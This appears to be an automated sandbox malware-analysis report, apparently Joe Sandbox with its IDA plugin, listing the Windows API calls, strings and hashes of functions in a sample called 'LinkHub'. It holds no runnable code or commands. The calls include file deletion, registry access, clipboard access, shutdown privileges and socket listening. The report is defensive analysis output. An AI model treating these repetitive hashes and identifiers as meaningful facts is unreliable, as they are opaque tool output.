                                                                      • Part of subcall function 00C7B329: _wcslen.LIBCMT ref: 00C7B333
                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00CE74F7
                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00CE7524
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                    • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                    • API String ID: 3830820486-3289030164
                                                                    • Opcode ID: 8454f559741e021dfbaa697462bf74f222c5eeded46e49141a057ae582e69825
                                                                    • Instruction ID: c2a2f07b848dff3b77f541c8234c6a178bab0880c47b03ee3c1a9a4fc5adf79d
                                                                    • Opcode Fuzzy Hash: 8454f559741e021dfbaa697462bf74f222c5eeded46e49141a057ae582e69825
                                                                    • Instruction Fuzzy Hash: 28D192B2508344AFC310EB64C885EAFB7ECAF98704F44491DF589D6291EB34DE48DB62
                                                                    Function 00CEA087 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00CEA0A8
                                                                    • GetFileAttributesW.KERNEL32(?), ref: 00CEA0E6
                                                                    • SetFileAttributesW.KERNEL32(?,?), ref: 00CEA100
                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00CEA118
                                                                    • FindClose.KERNEL32(00000000), ref: 00CEA123
                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00CEA13F
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00CEA18F
                                                                    • SetCurrentDirectoryW.KERNEL32(00D37B94), ref: 00CEA1AD
                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00CEA1B7
                                                                    • FindClose.KERNEL32(00000000), ref: 00CEA1C4
                                                                    • FindClose.KERNEL32(00000000), ref: 00CEA1D4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                    • String ID: *.*
                                                                    • API String ID: 1409584000-438819550
                                                                    • Opcode ID: 6d00816f99d8e5dfb96d8ffefbe82358061c3d1dbe76aa3eb0324f7ffe525cf9
                                                                    • Instruction ID: b3cc65210c152c32a6d28c9309d7c200a68b022efa920e8d4b940d5d1be54db2
                                                                    • Opcode Fuzzy Hash: 6d00816f99d8e5dfb96d8ffefbe82358061c3d1dbe76aa3eb0324f7ffe525cf9
                                                                    • Instruction Fuzzy Hash: C631E472600659AFDF24AFB6DC49BDE77AD9F05320F100156E829E2190EB70EE44CB75
                                                                    Function 00CE4763 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00CE4785
                                                                    • _wcslen.LIBCMT ref: 00CE47B2
                                                                    • CreateDirectoryW.KERNEL32(?,00000000), ref: 00CE47E2
                                                                    • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00CE4803
                                                                    • RemoveDirectoryW.KERNEL32(?), ref: 00CE4813
                                                                    • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00CE489A
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00CE48A5
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00CE48B0
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                    • String ID: :$\$\??\%s
                                                                    • API String ID: 1149970189-3457252023
                                                                    • Opcode ID: 3cb10284c20e3bfeae3ac1725d2a07aa4814204747f177b69857d9b6fa0a96ef
                                                                    • Instruction ID: b49a1be05b37bb44730e6c5ef2fb55f366d96087d23a8b1a19cb7e066165fbcb
                                                                    • Opcode Fuzzy Hash: 3cb10284c20e3bfeae3ac1725d2a07aa4814204747f177b69857d9b6fa0a96ef
                                                                    • Instruction Fuzzy Hash: B231AF72900249ABDB209BA1DC49FEB37BDEF89700F1040B6F519D21A0EB709744CB64
                                                                    Function 00CEA1E2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00CEA203
                                                                    • FindNextFileW.KERNEL32(00000000,?), ref: 00CEA25E
                                                                    • FindClose.KERNEL32(00000000), ref: 00CEA269
                                                                    • FindFirstFileW.KERNEL32(*.*,?), ref: 00CEA285
                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 00CEA2D5
                                                                    • SetCurrentDirectoryW.KERNEL32(00D37B94), ref: 00CEA2F3
                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00CEA2FD
                                                                    • FindClose.KERNEL32(00000000), ref: 00CEA30A
                                                                    • FindClose.KERNEL32(00000000), ref: 00CEA31A
                                                                      • Part of subcall function 00CDE399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00CDE3B4
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                    • String ID: *.*
                                                                    • API String ID: 2640511053-438819550
                                                                    • Opcode ID: 0713fd6e78d7a5fa15599b2396ad03535055a744f089bfa74a887fec05d0e2d0
                                                                    • Instruction ID: 85206e4f764310f52c0a3e260cf8ed950bbd97db04f09659efd2f0cdb674a080
                                                                    • Opcode Fuzzy Hash: 0713fd6e78d7a5fa15599b2396ad03535055a744f089bfa74a887fec05d0e2d0
                                                                    • Instruction Fuzzy Hash: E03112725006496ECF20AFB6DC49BDE77ADAF45320F104192E928E31A1DB71EF85CB25
                                                                    Function 00CFC8A4 Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00CFD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00CFC10E,?,?), ref: 00CFD415
                                                                      • Part of subcall function 00CFD3F8: _wcslen.LIBCMT ref: 00CFD451
                                                                      • Part of subcall function 00CFD3F8: _wcslen.LIBCMT ref: 00CFD4C8
                                                                      • Part of subcall function 00CFD3F8: _wcslen.LIBCMT ref: 00CFD4FE
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00CFC99E
                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00CFCA09
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00CFCA2D
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00CFCA8C
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00CFCB47
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00CFCBB4
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00CFCC49
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 00CFCC9A
                                                                    • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00CFCD43
                                                                    • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00CFCDE2
                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00CFCDEF
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                    • String ID:
                                                                    • API String ID: 3102970594-0
                                                                    • Opcode ID: 74acd17cf4e4b49d1e4f11fd20b4e14932b195036c48057c421487d6211d99d2
                                                                    • Instruction ID: 96b6a5ccd1f2b3980c3f1ec68a40d36ff3ee9b59b3efc2079b9c76ad990e6fd7
                                                                    • Opcode Fuzzy Hash: 74acd17cf4e4b49d1e4f11fd20b4e14932b195036c48057c421487d6211d99d2
                                                                    • Instruction Fuzzy Hash: DD024C716042089FC754DF24C9D5E2ABBE5EF88304F18849DE959CB2A2CB31ED46DB52
                                                                    Function 00CDD921 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C75851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C755D1,?,?,00CB4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00C75871
                                                                      • Part of subcall function 00CDEAB0: GetFileAttributesW.KERNEL32(?,00CDD840), ref: 00CDEAB1
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00CDD9CD
                                                                    • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 00CDDA88
                                                                    • MoveFileW.KERNEL32(?,?), ref: 00CDDA9B
                                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 00CDDAB8
                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00CDDAE2
                                                                      • Part of subcall function 00CDDB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,00CDDAC7,?,?), ref: 00CDDB5D
                                                                    • FindClose.KERNEL32(00000000,?,?,?), ref: 00CDDAFE
                                                                    • FindClose.KERNEL32(00000000), ref: 00CDDB0F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                    • String ID: \*.*
                                                                    • API String ID: 1946585618-1173974218
                                                                    • Opcode ID: bf04aac201d5e7f7a892c672c8dcf9333fbbb795dbebf987ff4a1509b83e3c80
                                                                    • Instruction ID: b4a749edf1cc6b98e0e136ffa5a91adec052a5bb5ece3abffd093ba335df2480
                                                                    • Opcode Fuzzy Hash: bf04aac201d5e7f7a892c672c8dcf9333fbbb795dbebf987ff4a1509b83e3c80
                                                                    • Instruction Fuzzy Hash: 08615F71C0110DAFCF15EBE0D952AEDBBB5AF14304F6080A6E50AB7295DB315F09EB61
                                                                    Function 00CEF7C7 Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                    • String ID:
                                                                    • API String ID: 1737998785-0
                                                                    • Opcode ID: 684c5a59f1bd7e0d617d747455a53fe81ec2f989c46e30879bdf0853c775871a
                                                                    • Instruction ID: 1c0896541dd69215f8d1a5de9fef3b69519fe0ac074fad955e66403e09742196
                                                                    • Opcode Fuzzy Hash: 684c5a59f1bd7e0d617d747455a53fe81ec2f989c46e30879bdf0853c775871a
                                                                    • Instruction Fuzzy Hash: 18419D35A04651AFD320DF26D888B157BE1FF45318F14C0ADE4698B7A2CB36ED42CBA0
                                                                    Function 00CDF20D Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00CD2010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00CD205A
                                                                      • Part of subcall function 00CD2010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00CD2087
                                                                      • Part of subcall function 00CD2010: GetLastError.KERNEL32 ref: 00CD2097
                                                                    • ExitWindowsEx.USER32(?,00000000), ref: 00CDF249
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                    • String ID: $ $@$SeShutdownPrivilege
                                                                    • API String ID: 2234035333-3163812486
                                                                    • Opcode ID: 053246f256703a7b7db99ed0fc262a49c9171f4d79e654077039286f59d0a038
                                                                    • Instruction ID: c89d90e9932025aebcf49c4fb82137ec474262651bffef7d36da0c39c16d0d0f
                                                                    • Opcode Fuzzy Hash: 053246f256703a7b7db99ed0fc262a49c9171f4d79e654077039286f59d0a038
                                                                    • Instruction Fuzzy Hash: 9C01D67A6102147BEB2462B89C8ABBE726CAB08344F15453BFF13E23D1D5605E06A1A0
                                                                    Function 00CF1C61 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00CF1CD3
                                                                    • WSAGetLastError.WSOCK32 ref: 00CF1CE0
                                                                    • bind.WSOCK32(00000000,?,00000010), ref: 00CF1D17
                                                                    • WSAGetLastError.WSOCK32 ref: 00CF1D22
                                                                    • closesocket.WSOCK32(00000000), ref: 00CF1D51
                                                                    • listen.WSOCK32(00000000,00000005), ref: 00CF1D60
                                                                    • WSAGetLastError.WSOCK32 ref: 00CF1D6A
                                                                    • closesocket.WSOCK32(00000000), ref: 00CF1D99
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorLast$closesocket$bindlistensocket
                                                                    • String ID:
                                                                    • API String ID: 540024437-0
                                                                    • Opcode ID: 9212e56bc8b4c420bcd3b5434c1ed7269054f320c81e377723dd092eba7d61cd
                                                                    • Instruction ID: bf853076521c6744ec62905ceba92eea2c31f96e2407fef3a4a7c83f926c0915
                                                                    • Opcode Fuzzy Hash: 9212e56bc8b4c420bcd3b5434c1ed7269054f320c81e377723dd092eba7d61cd
                                                                    • Instruction Fuzzy Hash: C4417C31A00204EFD750DF68C484B29BBF6AB45318F18C199E95A8F396C771ED81CBE2
                                                                    Function 00CABCD2 Relevance: 10.9, APIs: 7, Instructions: 370timeCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • _free.LIBCMT ref: 00CABD54
                                                                    • _free.LIBCMT ref: 00CABD78
                                                                    • _free.LIBCMT ref: 00CABEFF
                                                                    • GetTimeZoneInformation.KERNEL32(?,00000000,00000000,00000000,?,00D146D0), ref: 00CABF11
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00D4221C,000000FF,00000000,0000003F,00000000,?,?), ref: 00CABF89
                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,00D42270,000000FF,?,0000003F,00000000,?), ref: 00CABFB6
                                                                    • _free.LIBCMT ref: 00CAC0CB
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ByteCharMultiWide$InformationTimeZone
                                                                    • String ID:
                                                                    • API String ID: 314583886-0
                                                                    • Opcode ID: c6f1e312153744659a09c4b88779a8ffcef8a69362bf2f9d4f86f0af2ef12135
                                                                    • Instruction ID: caab78623762706a1abe576e06a95acbc4819295707c92fee637dfc8a831882d
                                                                    • Opcode Fuzzy Hash: c6f1e312153744659a09c4b88779a8ffcef8a69362bf2f9d4f86f0af2ef12135
                                                                    • Instruction Fuzzy Hash: 2BC137359002469FDB249F78DC41BAABBB9EF43318F18419AF5A1DB253E7708E41DB60
                                                                    Function 00CDDC54 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00C75851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00C755D1,?,?,00CB4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00C75871
                                                                      • Part of subcall function 00CDEAB0: GetFileAttributesW.KERNEL32(?,00CDD840), ref: 00CDEAB1
                                                                    • FindFirstFileW.KERNEL32(?,?), ref: 00CDDCCB
                                                                    • DeleteFileW.KERNEL32(?,?,?,?), ref: 00CDDD1B
                                                                    • FindNextFileW.KERNEL32(00000000,00000010), ref: 00CDDD2C
                                                                    • FindClose.KERNEL32(00000000), ref: 00CDDD43
                                                                    • FindClose.KERNEL32(00000000), ref: 00CDDD4C
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                    • String ID: \*.*
                                                                    • API String ID: 2649000838-1173974218
                                                                    • Opcode ID: 97a3c8e84ebb654553ed25e0d183f0106ef1e33d7d97a506871bcf16d226ece4
                                                                    • Instruction ID: f65acff1e3fedbaffd52a9e74d14ce1af665166f61a286ecea267712df2964c6
                                                                    • Opcode Fuzzy Hash: 97a3c8e84ebb654553ed25e0d183f0106ef1e33d7d97a506871bcf16d226ece4
                                                                    • Instruction Fuzzy Hash: A63163314083459FC700EFA0C8859AFBBE9BE95300F404D5EF5EA82291EB21DE09DB67
                                                                    Function 00CE3A0E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00CB56C2,?,?,00000000,00000000), ref: 00CE3A1E
                                                                    • FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00CB56C2,?,?,00000000,00000000), ref: 00CE3A35
                                                                    • LoadResource.KERNEL32(?,00000000,?,?,00CB56C2,?,?,00000000,00000000,?,?,?,?,?,?,00C766CE), ref: 00CE3A45
                                                                    • SizeofResource.KERNEL32(?,00000000,?,?,00CB56C2,?,?,00000000,00000000,?,?,?,?,?,?,00C766CE), ref: 00CE3A56
                                                                    • LockResource.KERNEL32(00CB56C2,?,?,00CB56C2,?,?,00000000,00000000,?,?,?,?,?,?,00C766CE,?), ref: 00CE3A65
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D33000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954903953.0000000000D3D000.00000004.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954928567.0000000000D45000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_38_2_c70000_LinkHub.jbxd
                                                                    Similarity
                                                                    • API ID: Resource$CreateFindGlobalLoadLockSizeofStream
                                                                    • String ID: SCRIPT
                                                                    • API String ID: 3051347437-3967369404
                                                                    • Opcode ID: 0baa553ac465827eb9d366430600870db5e5f14adaf6b54ceaca2a864b15ce3c
                                                                    • Instruction ID: 333173faf168e196e7338ffb7d4966179bd7e068e173fd4f59f766b9c57b8c6e
                                                                    • Opcode Fuzzy Hash: 0baa553ac465827eb9d366430600870db5e5f14adaf6b54ceaca2a864b15ce3c
                                                                    • Instruction Fuzzy Hash: 1F117970200741BFE7218BA6DC4CF277BBAEBC5B40F14426DB816DB2A0DB71E9419A30
                                                                    Function 00CD20AA Relevance: 9.1, APIs: 6, Instructions: 68memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                      • Part of subcall function 00CD1900: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00CD1916
                                                                      • Part of subcall function 00CD1900: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00CD1922
                                                                      • Part of subcall function 00CD1900: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00CD1931
                                                                      • Part of subcall function 00CD1900: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00CD1938
                                                                      • Part of subcall function 00CD1900: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00CD194E
                                                                    • GetLengthSid.ADVAPI32(?,00000000,00CD1C81), ref: 00CD20FB
                                                                    • GetProcessHeap.KERNEL32(00000008,00000000), ref: 00CD2107
                                                                    • HeapAlloc.KERNEL32(00000000), ref: 00CD210E
                                                                    • CopySid.ADVAPI32(00000000,00000000,?), ref: 00CD2127
                                                                    • GetProcessHeap.KERNEL32(00000000,00000000,00CD1C81), ref: 00CD213B
                                                                    • HeapFree.KERNEL32(00000000), ref: 00CD2142
                                                                    Memory Dump Source
                                                                    • Source File: 00000026.00000002.1954783674.0000000000C71000.00000020.00000001.01000000.00000011.sdmp, Offset: 00C70000, based on PE: true
                                                                    • Associated: 00000026.00000002.1954762123.0000000000C70000.00000002.00000001.01000000.00000011.sdmpDownload File
                                                                    • Associated: 00000026.00000002.1954845173.0000000000D0D000.00000002.00000001.01000000.00000011.sdmpDownload File
